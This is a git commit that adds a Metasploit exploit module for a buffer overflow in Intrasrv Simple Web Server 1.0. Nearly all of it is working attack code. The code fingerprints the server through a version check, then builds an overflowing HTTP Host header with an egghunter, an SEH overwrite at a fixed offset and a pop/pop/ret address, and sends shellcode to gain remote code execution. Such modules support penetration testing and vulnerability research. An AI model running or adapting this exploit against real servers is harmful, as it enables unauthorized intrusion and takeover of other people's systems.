Added Intrasrv 1.0 BOF

neinwechter · neinwechter · commit 6fe4e3dd0e90 · 2013-08-10T15:56:07.000-04:00
diff --git a/modules/exploits/windows/http/intrasrv_bof.rb b/modules/exploits/windows/http/intrasrv_bof.rb
@@ -0,0 +1,106 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+#   http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = NormalRanking
+
+	include Msf::Exploit::Remote::Tcp
+	include Msf::Exploit::Egghunter
+
+	def initialize(info={})
+		super(update_info(info,
+			'Name'           => "Intrasrv 1.0 Buffer Overflow",
+			'Description'    => %q{
+					    This module exploits a boundary condition error in Intrasrv
+					Simple Web Server 1.0. The web interface does not validate the 
+					boundaries of an HTTP request string prior to copying the data
+					to an insufficiently large buffer. Successful exploitation leads 
+					to arbitrary remote code execution in the context of the application. 
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         =>
+				[
+					'xis_one@STM Solutions',  #Discovery, PoC
+					'PsychoSpy <neinwechter[at]gmail.com>' #Metasploit
+				],
+			'References'     =>
+				[
+					['OSVDB', '94097'],
+					['EDB','18397'],
+					['BID','60229']
+				],
+			'Payload'        =>
+				{
+					'StackAdjustment' => -3500,
+					'BadChars' => "\x00"
+				},
+			'DefaultOptions'  =>
+				{
+					'ExitFunction' => "thread"
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					['v1.0 - XP/2003/Win7',
+						{
+							'Offset' => 1553,
+							'Ret'=>0x004097dd #p/p/r - intrasrv.exe
+						}
+					]
+				],
+			'Privileged'     => false,
+			'DisclosureDate' => "May 30 2013",
+			'DefaultTarget'  => 0))
+
+			register_options(
+				[
+					OptPort.new('RPORT', [true, 'The remote port', 80])
+				], self.class)
+	end
+
+	def check
+		begin
+			connect
+		rescue
+			print_error("Could not connect to target!")
+			return Exploit::CheckCode::Safe
+		end
+		sock.put("GET / HTTP/1.0\r\n")
+		res = sock.get
+
+		if res and res =~ /intrasrv 1.0/
+			return Exploit::CheckCode::Vulnerable
+		else
+			return Exploit::CheckCode::Safe
+		end
+	end
+
+	def exploit
+		# setup egghunter
+		hunter,egg = generate_egghunter(payload.encoded, payload_badchars, {
+				:checksum => true
+			})
+		
+		# setup buffer
+		buf = rand_text_alpha(target['Offset']-128)		# junk to egghunter
+		buf << make_nops(8) + hunter				# nopsled + egghunter at offset-128
+		buf << rand_text_alpha(target['Offset']-buf.length)	# more junk to offset
+		buf << "\xeb\x80\x90\x90" 				# nseh - jmp -128 to egghunter
+		buf << [target.ret].pack("V*") 				# seh
+
+		# attach egg tag to payload
+		shellcode = egg + egg
+		shellcode << payload.encoded
+
+		print_status("Sending buffer...")
+		connect
+		sock.put("GET / HTTP/1.0\r\nHost: #{buf}\r\n#{shellcode}")
+		disconnect
+	end
+end
